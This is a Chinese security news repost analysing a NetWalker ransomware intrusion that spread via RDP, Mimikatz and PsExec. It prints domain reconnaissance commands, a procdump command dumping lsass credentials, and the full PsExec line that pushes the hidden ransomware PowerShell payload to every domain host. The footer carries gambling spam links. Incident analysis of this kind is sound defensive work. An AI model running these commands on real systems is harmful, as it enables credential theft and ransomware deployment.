安基网 首页 资讯 安全报 查看内容

一个小时攻陷计算机—家族勒索软件NetWalker分析

2020-9-10 09:08| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 近期发现有黑客通过RDP登录,运行类似Cobalt Strike家族的勒索软件。大致的过程为:首先入侵域控服务器,然后使用Prodump和Mimikatz进行内存转储,再利用PsExec在所有加入域的系统上运行NetWalker勒索软件的有效载荷 ...
近期发现有黑客通过RDP登录,运行类似Cobalt Strike家族的勒索软件。大致的过程为:首先入侵域控服务器,然后使用Prodump和Mimikatz进行内存转储,再利用PsExec在所有加入域的系统上运行NetWalker勒索软件的有效载荷感染域内所有计算机。

通过观察,在攻击的前几分钟内攻击者就能进入域控制器,并且整个入侵大约仅花费1个小时左右

在攻击发生前后,能看到多条RDP登录日志,可以定位198.181.163.103(这是一个“肉鸡”)就是这次入侵的来源。我们还可以定位到有黑客使用管理员帐户登录其它主机。

在整个攻击过程中,黑客使用c37.ps1作为命令和控制的工具。在初始登录后大约16分钟运行,此脚本就被删除。通过运行此脚本并抓包分析,似乎它没有发起任何网络连接,所以该脚本是否有效仍存在疑问。

从图1看此脚本被严重混淆,但看起来与Cobalt Strike非常类似。当把脚本上传到相关检测网站时,有分析者认为它可能包含Windshield或SplinterRAT,如下:

图1:经过混淆的c37。ps1脚本截图

需要说明的是,虽然攻击已经过了10天,但使用主流恶意软件进行扫描后发现,检测率还是较低,说明曝光率不是太高。

几分钟后,被攻击的计算机运行执行程序c37.exe,它将自身复制到临时目录中,然后停止运行。此二进制文件包括Neshta以及许多功能,如下所示:

图2:c37。exe的主要功能

经过仔细地分析,可以确定这个恶意软件就是隶属于Cobalt Strike家族的,以下是回连信息:

图3:回连信息

然后在一些沙盒中运行c37。ps1和c37。exe这两个程序,但都没有捕获到网络流量,这表明它们包括了沙箱规避技术。

经过分析,c37.exe二进制文件包括来自NeshtapoisonBazarBackdoorXMRig的共享代码以及来自Cobalt Strike的大部分原生代码:

图4:分析结果示意

它们会释放脚本文件adf.bat文件,如下:

图5:adf.bat脚本内容

在AdFind运行几分钟后,一个命令窗口被打开,执行以下命令(要么被缓慢地复制粘贴,要么被手动键入):

nltest /dclist:

net group "Domain Computers" /DOMAIN

net groups "Enterprise Admins" /domain

net user Administrator

之后不久,一个名为pcr.bat文件被释放并执行:

图6:pcr.bat示意

稍后Mimikatz被删除,一分钟后procdump64。exe也被删除。然后攻击者使用Procdump命令转储lsass:

procdump64.exe -ma lsass.exe lsass.dmp

这个procdump64二进制文件似乎是用Delphi编译的,与已知的文件值摘要情报均不匹配。看来是攻击者对原生代码进行了修改,但包括了部分原始程序。

攻击者在转储凭据后进入域控制器(DC),在进入域控服务器不久后释放了ip。list。txt文件、P100119。ps1文件和PsExec程序。

攻击者用PsExec作为域管理员在所有系统上挂载一个共享,然后使用PowerShell执行勒索软件有效负载。NetWalker通过以下命令发送到所有在线加入域的系统:

C:psexec.exe @ip-list.txt -d cmd /c “(net use q: /delete /y &; net use q: DomainControllerDomainName /user:DomainNameadministrator ThisWasThePassword &; powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -File q:P100119.ps1”

运行PowerShell脚本后,将显示如下勒索通知:

图7:勒索信息

NetWalker的使用者要求在指定的期限内交纳高达数万美元的赎金。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6870417994212704772/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
福星彩票计划群 吉林快3计划 海南4+1 快三娱乐平台 威尼斯人彩票计划群 盛兴彩票计划群 内蒙古11选5走势图 极速赛车计划网页版 256彩票计划群 好盈彩票计划群